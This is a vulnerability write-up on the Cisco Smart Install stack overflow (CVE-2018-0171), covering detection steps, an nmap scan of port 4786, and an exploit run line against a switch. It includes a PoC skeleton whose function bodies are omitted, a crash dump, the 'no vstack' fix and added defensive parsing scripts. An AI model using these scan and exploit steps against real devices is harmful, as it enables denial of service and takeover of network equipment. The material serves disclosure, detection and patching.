
Cisco Smart Install Remote Command Execution Vulnerability

0x01 Preface

A stack-based buffer overflow was found in the Smart Install Client code; an attacker can exploit it to execute arbitrary code remotely without any authentication. Cisco Smart Install is a "plug-and-play" configuration and image-management feature that simplifies the deployment of new switches: a user can place a Cisco switch anywhere, cable it into the network and power it on, with no further configuration required. Because of this, exploiting the flaw gives complete control over a vulnerable network device. Smart Install automates the initial configuration process and provisions a new switch with the currently loaded operating-system image; it can also provide hot-swappable real-time backups when the configuration changes. Note that this feature is enabled by default on clients.

0x02 Vulnerability description

The Smart Install Client code in Cisco IOS and IOS XE contains a stack buffer overflow vulnerability (CVE-2018-0171). An attacker can remotely send a crafted packet to TCP port 4786 to trigger the stack overflow on the target device, causing a denial of service (DoS) or remote command execution, and thereby take remote control of affected network devices. TCP port 4786 is reportedly open by default on Cisco switches.

0x03 Checking for the vulnerability

1. If your Cisco network device has TCP port 4786 open, it is exposed to attack. To find such devices, scan the target network with nmap:

nmap -p T:4786 192.168.1.0/24

2. To check whether the Smart Install Client feature is enabled on a device, look at the `show vstack config` output. The following examples are from Cisco Catalyst switches configured as Smart Install clients:

switch1# show vstack config
 Role: Client (SmartInstall enabled)

switch2# show vstack config
 Capability: Client
 Oper Mode: Enabled
 Role: Client

"Role: Client" together with "Oper Mode: Enabled", or "Role: Client (SmartInstall enabled)", in the show vstack config output confirms that the feature is enabled on the device.

3. Run the following command on the Cisco device: if port 4786 is listening, SMI is in use.

switch>show tcp brief all
TCB       Local Address       Foreign Address     (state)
0344B794  *.4786              *.*                 LISTEN
0350A018  *.443               *.*                 LISTEN
03293634  *.443               *.*                 LISTEN
03292D9C  *.80                *.*                 LISTEN
03292504  *.80                *.*                 LISTEN

Cisco IOS and IOS XE software version check:

Router> show version
Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team

ios-xe-device# show version
Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre

4. If you are not sure whether your software is affected, use the Cisco IOS Software Checker:

https://tools.cisco.com/security/center/softwarechecker.x

5. Use the following script to probe whether the service on the target IP and port really is the Cisco SMI protocol:

https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py

The protocol fingerprint can be found in the Metasploit module commit:

https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d

python smi_check.py -i targetip
[INFO] Sending TCP probe to targetip:4786
[INFO] Smart Install Client feature active on targetip:4786
[INFO] targetip is affected

0x04 Affected scope

Affected devices:

Catalyst 4500 Supervisor Engines

Cisco Catalyst 3850 Series Switches

Cisco Catalyst 2960 Series Switches

Devices that include part of the Smart Install Client code may also be affected:

Catalyst 3850 Series

Catalyst 3750 Series

Catalyst 3650 Series

Catalyst 3560 Series

Catalyst 2960 Series

Catalyst 2975 Series

IE 2000

IE 3000

IE 3010

IE 4000

IE 4010

IE 5000

SM-ES2 SKUs

SM-ES3 SKUs

NME-16ES-1G-P

SM-X-ES3 SKUs

0x05 Vulnerability verification

Below is the PoC used to verify this vulnerability (the function bodies are omitted in the original post):

import socket
import struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
(options, args) = parser.parse_args()

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    ...  # body omitted in the original post

def send_packet(sock, packet):
    ...  # body omitted in the original post

def receive(sock):
    ...  # body omitted in the original post

if __name__ == "__main__":
    ...  # body omitted in the original post

To attack the switch, run the following command:

host$ ./smi_ibc_init_discovery_BoF.py -t 192.168.1.1

The switch should display crash information and reboot:

00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPU: vector 1200, PC = 42424240
-Traceback= 42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) ===
Buffered messages:
...
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053
LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128
R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240, SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
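The crashinfo above is the evidence an incident responder gets from an affected switch. As an added example (not code from the original post or from Cisco), the following Python helper parses such a register dump and checks whether PC, LR and the saved registers hold a repeated printable-byte pattern (here 0x42424242, "BBBB"), which distinguishes a crash caused by attacker-controlled stack data from an ordinary software fault. The sample text is copied from the dump above; the function names and the verdict strings are this example's own.

```python
import re

# Sample copied from the crashinfo shown in the post (constructed input for this example).
SAMPLE_CRASHINFO = """\
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPU: vector 1200, PC = 42424240
-Traceback= 42424240
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
CPU Register Context:
Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053
LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128
R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240, SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
"""

# Register assignments of the form NAME = 0xHHHHHHHH (PC, LR, SP, SRR0, R0..R31).
REG_RE = re.compile(r"\b(PC|LR|SP|SRR0|R\d{1,2})\s*=\s*0x([0-9A-Fa-f]{8})")


def parse_registers(crashinfo: str) -> dict:
    """Return {register name: [values in order of appearance]}."""
    regs = {}
    for name, hexval in REG_RE.findall(crashinfo):
        regs.setdefault(name, []).append(int(hexval, 16))
    return regs


def looks_like_filler(value: int) -> bool:
    """True if the 32-bit word is one printable ASCII byte repeated four times.
    The two low bits are ignored: PowerPC instruction addresses are 4-byte
    aligned, so a smashed PC shows up as 0x42424240 rather than 0x42424242."""
    b = value.to_bytes(4, "big")
    if not (0x20 <= b[0] < 0x7F):
        return False
    return b[0] == b[1] == b[2] and (b[3] & 0xFC) == (b[0] & 0xFC)


def triage_crashinfo(crashinfo: str) -> dict:
    """Decide whether a crash looks like control-flow hijack by attacker-supplied data."""
    regs = parse_registers(crashinfo)
    pc = regs.get("PC", [None])[0]
    lr = regs.get("LR", [None])[0]
    # General-purpose registers whose saved value is the filler pattern.
    gprs = sorted(
        (n for n in regs if n[0] == "R" and n[1:].isdigit() and looks_like_filler(regs[n][0])),
        key=lambda n: int(n[1:]),
    )
    pc_controlled = pc is not None and looks_like_filler(pc)
    lr_controlled = lr is not None and looks_like_filler(lr)
    result = {
        "pc": pc,
        "lr": lr,
        "pc_controlled": pc_controlled,
        "lr_controlled": lr_controlled,
        "controlled_gprs": gprs,
        # An instruction fetch from an unmapped page means execution jumped somewhere bogus.
        "unmapped_fetch": "Instruction TLB Miss" in crashinfo,
    }
    if pc_controlled and lr_controlled:
        result["verdict"] = "stack smash: return address overwritten with attacker-supplied data"
    elif pc_controlled or gprs:
        result["verdict"] = "suspicious: filler pattern in registers, investigate"
    else:
        result["verdict"] = "no filler pattern; likely an ordinary software fault"
    return result


if __name__ == "__main__":
    for key, val in triage_crashinfo(SAMPLE_CRASHINFO).items():
        print(f"{key}: {val}")
```

Run it against a real crashinfo file pulled from flash: the combination of a filler pattern in PC and LR plus an instruction TLB miss is the signature of a saved return address being overwritten, which is what the Smart Install overflow produces; a crash with sane code addresses in PC and LR is more likely a plain software bug.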

0x06 漏洞修複

#conf t

Enter configuration commands, one per line. End with CNTL/Z.

NSJ-131-6-16-C2960_7(config)#no vstack

NSJ-131-6-16-C2960_7(config)#exit

關鍵的就是這句 no vstack

再看,端口已經關掉了。

#show tcp brief all

TCB Local Address Foreign Address (state)

075A0088 .443 .* LISTEN

0759F6C8 .443 .* LISTEN

0759ED08 .80 .* LISTEN

0759E348 .80 .* LISTEN
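The `show vstack config` and `show tcp brief all` checks from steps 2 and 3 of section 0x03 are the same two commands used to confirm the fix here. As an added example (not code from the original post or from Cisco), the following Python script parses both outputs and reports whether a device still exposes Smart Install, so the same audit can be run over output captured before and after `no vstack`. The sample outputs are copied from this post; the "disabled" vstack sample is an assumed form that the post does not show, and the function names are this example's own.

```python
import re

# Samples copied from the command output shown in this post (constructed input).
VSTACK_CLIENT_OLD_FORMAT = """\
switch1# show vstack config
 Role: Client (SmartInstall enabled)
"""
VSTACK_CLIENT_NEW_FORMAT = """\
switch2# show vstack config
 Capability: Client
 Oper Mode: Enabled
 Role: Client
"""
# Assumed output after `no vstack`; the post does not show this form.
VSTACK_DISABLED = """\
switch2# show vstack config
 Capability: Client
 Oper Mode: Disabled
 Role: Client
"""
TCP_BRIEF_BEFORE_FIX = """\
switch>show tcp brief all
TCB       Local Address       Foreign Address     (state)
0344B794  *.4786              *.*                 LISTEN
0350A018  *.443               *.*                 LISTEN
03293634  *.443               *.*                 LISTEN
03292D9C  *.80                *.*                 LISTEN
03292504  *.80                *.*                 LISTEN
"""
TCP_BRIEF_AFTER_FIX = """\
#show tcp brief all
TCB       Local Address       Foreign Address     (state)
075A0088  *.443               *.*                 LISTEN
0759F6C8  *.443               *.*                 LISTEN
0759ED08  *.80                *.*                 LISTEN
0759E348  *.80                *.*                 LISTEN
"""

SMI_PORT = 4786  # Smart Install listens here by default


def vstack_fields(output: str) -> dict:
    """Turn the 'Key: Value' lines of `show vstack config` into a lower-cased dict."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Za-z][A-Za-z ]*?)\s*:\s*(.+?)\s*$", line)
        if m:
            fields[m.group(1).lower()] = m.group(2)
    return fields


def smart_install_client_enabled(output: str) -> bool:
    """Handle both output formats: 'Role: Client (SmartInstall enabled)' on older
    IOS, and 'Capability / Oper Mode / Role' on newer IOS. Either confirms an
    active client. Director-only or non-client output is reported as not enabled."""
    fields = vstack_fields(output)
    role = fields.get("role", "").lower()
    if "client" not in role:
        return False
    if "smartinstall enabled" in role:
        return True
    return fields.get("oper mode", "").lower() == "enabled"


def listening_tcp_ports(output: str) -> set:
    """Local ports in LISTEN state from `show tcp brief all`."""
    ports = set()
    for line in output.splitlines():
        # TCB handle, local addr.port, foreign addr.port, state
        m = re.match(r"\s*[0-9A-Fa-f]{8}\s+\S+\.(\d+)\s+\S+\s+LISTEN\b", line)
        if m:
            ports.add(int(m.group(1)))
    return ports


def assess(vstack_output: str, tcp_brief_output: str) -> dict:
    """Combine both checks; the device is exposed if either says Smart Install is up."""
    client_enabled = smart_install_client_enabled(vstack_output)
    port_open = SMI_PORT in listening_tcp_ports(tcp_brief_output)
    if client_enabled or port_open:
        verdict = "AFFECTED: apply `no vstack` and confirm TCP 4786 stops listening"
    else:
        verdict = "not exposed"
    return {"client_enabled": client_enabled, "port_4786_listening": port_open, "verdict": verdict}


if __name__ == "__main__":
    print("before fix:", assess(VSTACK_CLIENT_NEW_FORMAT, TCP_BRIEF_BEFORE_FIX))
    print("after fix: ", assess(VSTACK_DISABLED, TCP_BRIEF_AFTER_FIX))
```

Feed it the two command outputs collected from each switch (for example over an existing configuration-backup job); treating the listening port and the vstack status as independent signals catches the case where one of them is missing from a partial capture.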

0x07 Impact

A buffer overflow on an affected device may have the following consequences:

triggering a reload of the device

allowing an attacker to execute arbitrary code on the device

putting the affected device into an endless reboot loop, crashing it

0x08 References

https://embedi.com/blog/cisco-smart-install-remote-code-execution/

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

https://www.anquanke.com/post/id/103122

https://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w

https://www.youtube.com/watch?v=CE7KNK6UJuk&feature=youtu.be&t=99

https://www.youtube.com/watch?v=TSg5EZVudNU&feature=youtu.be

Original: http://www.cnblogs.com/backlion/p/8675854.html